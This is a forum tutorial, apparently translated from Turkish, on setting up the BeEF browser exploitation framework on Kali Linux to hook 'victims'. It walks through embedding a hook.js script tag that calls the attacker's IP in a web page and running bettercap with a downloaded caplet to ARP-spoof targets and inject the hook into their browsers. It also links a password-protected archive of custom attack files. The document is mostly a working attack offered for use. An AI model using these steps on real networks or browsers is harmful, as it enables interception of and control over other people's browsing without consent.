What is BeEF?
In this regard, we will examine a tool called Beef. This tool is called browser exploitation framework, which is a tool for exploiting browsers.
Hackers use this tool to run javascript code in the target computer's browser.
BeEF consists of 3 layers.
1- Personal computers of the Attacker or Attackers
2- The server where BeEF is installed
3- Goals
How to Install BeEF on Kali Linux?
We open the terminal and we are writing this.
Code:
git clone https://github.com/beefproject/beef
After the installation is finished, we are writing ls to the terminal and we see the beef.
We are typing cd beef and go into the beef folder.
We are writing./install for once on purpose and say "y" to the questions and entering.
Now, when we turn the system off and on, it is enough to say "cd beef" "./beef".
The error here is asking us to change our username password in beef.
For this, we are writing nano config.yaml in the terminal.
After the user and passwd are changed, we do "CTRL-O" "enter" "CTRL-X" and scolding.
For login to Beef, you can enter ./beef by clicking one of the addresses below after typed.
Friends, I will show you on apache server so that you can understand BeEF basically.
First of all, I will create a website by using the service called Apache in Linux.
This is for example purposes only, you can think more creatively and hook your victims to the hook.
For this, I come to the console and I am writing service apache2 start.
Then I am editing the index of my site and I am going to the /var/www/index.html directory.
We open the index.html with the help of a leafpad or another application and we are pasting the code <script src = "http://127.0.0.1:3000/hook.js"> </script> into it. You are requiring to write your own IP address instead of 127.0.0.1.
To learn our own IP, we come to the terminal and we are writing ifconfig mine is 10.0.2.10 so I am writing the code like this <script src = "http://10.0.2.10:3000/hook.js"> </script>
Yes, our goal taken the bait, the victim has to stay on the site in order to reach our goal for a long time.
We will inject a Javascript code into our victim's browser so that we can access it even if it leaves our site.
For this, we will use bettercap, which is available in Kali Linux.
First you are requiring to download the file named beefcustom.zip that I gave you below the topic.
We are throwing the file named beefcustom in the downloaded RAR file to usr / share / bettercap / caplets directory.
Open the file named beefcustom.cap in the Beefcustom file with a leafpad or another application.
Instead of the ip where it says set arp.spoof.targets 10.0.2.4, we are writing the ips of our victim.
Then we are opening the file named beefcustom.js in the same way, we are writing our own ip address instead of 10.0.2.8, save and closing.
To run Bettercamp, we are writing bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap to the terminal.
Yes, now victim online, let's try our commands in our victim's browser for this, we are clicking on the Commands section shown in the photo below.
The green ones mean they will work, the red ones mean they will work less likely.
I am clicking on the Browser section in the Commands section, there is a command called Create Alert Dialog in Hooked Domain, let's try that will send a warning message to our victim.
Yes, we have a warning message.
BEEF CUSTOM DOWNLOAD LINK:https://www.dosyaupload.com/cgZ8
RAR PASS : pytang
VIRUS TOTAL :https://www.virustotal.com/gui/file...23f57240b2e6273c6b5ed04edb1168a8056/detection
Source:https://www.turkhackteam.org/siber-...sil-kullanilir-browserlari-somurme-araci.html